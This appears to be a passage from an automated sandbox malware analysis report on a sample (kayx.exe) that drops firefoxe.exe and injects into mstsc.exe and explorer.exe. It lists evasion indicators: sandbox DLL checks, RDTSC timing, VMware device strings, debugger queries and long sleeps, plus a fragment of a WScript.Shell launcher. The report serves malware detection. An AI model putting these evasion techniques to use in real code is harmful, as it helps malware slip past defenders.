          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: kayx.exe, 00000001.00000002.355951256.0000000005BC0000.00000004.00000001.sdmp, firefoxe.exe, 00000013.00000002.488821328.0000000005540000.00000004.00000001.sdmp, firefoxe.exe, 00000014.00000002.485995375.00000000036F1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLLHEAD%YCLYIDUONHMGOW.VBSKCREATEOBJECT("WSCRIPT.SHELL").RUN """
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\kayx.exeRDTSC instruction interceptor: First address: 00000000004083C4 second address: 00000000004083CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\kayx.exeRDTSC instruction interceptor: First address: 000000000040875E second address: 0000000000408764 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 0000000002F083C4 second address: 0000000002F083CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 0000000002F0875E second address: 0000000002F08764 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00408690 rdtsc
          Source: C:\Users\user\Desktop\kayx.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\kayx.exe TID: 6564Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\mstsc.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeFile opened: C:\Users\user\AppData\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeFile opened: C:\Users\user\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
          Source: explorer.exe, 00000012.00000000.377242682.000000000F67D000.00000004.00000001.sdmpBinary or memory string: 00000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f563
          Source: explorer.exe, 00000012.00000000.373920337.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000012.00000000.373920337.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000012.00000000.366341161.0000000004DF3000.00000004.00000001.sdmpBinary or memory string: _VMware_SATA_CD00#5&}
          Source: explorer.exe, 00000012.00000000.373348445.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000012.00000000.373649853.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: firefoxe.exe, 00000014.00000002.485995375.00000000036F1000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000012.00000000.377242682.000000000F67D000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
          Source: explorer.exe, 00000012.00000000.367147757.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000012.00000000.373920337.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000012.00000000.373920337.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000012.00000000.367196676.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000012.00000000.377242682.000000000F67D000.00000004.00000001.sdmpBinary or memory string: 53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f
          Source: explorer.exe, 00000012.00000000.377242682.000000000F67D000.00000004.00000001.sdmpBinary or memory string: d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000012.00000000.373348445.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000012.00000000.373348445.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000012.00000000.373348445.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\kayx.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\kayx.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\mstsc.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00408690 rdtsc
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_004098F0 LdrLoadDll,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E040E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E040E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E040E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E058EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E9B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E490AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E09080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E83884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E83884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E20050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E20050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E1B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E1B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E1B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E1B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E87016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E87016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E87016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E0B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E0B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E0B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E941E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E869A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E32990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E0C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E0B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E0B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E24120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E09100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E09100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E09100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E32AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E32ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E1AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E1AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EBB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EBB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E4927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ECEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E94257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E44A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E44A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E18A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E05210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E05210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E05210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E05210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E0AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E0AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ECAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ECAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E23A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E34BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E34BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E34BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EBD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E11B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E11B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E32397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E0DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E33B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E33B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E0DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E0F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E86CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E86CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E86CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E1849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E9C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E9C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
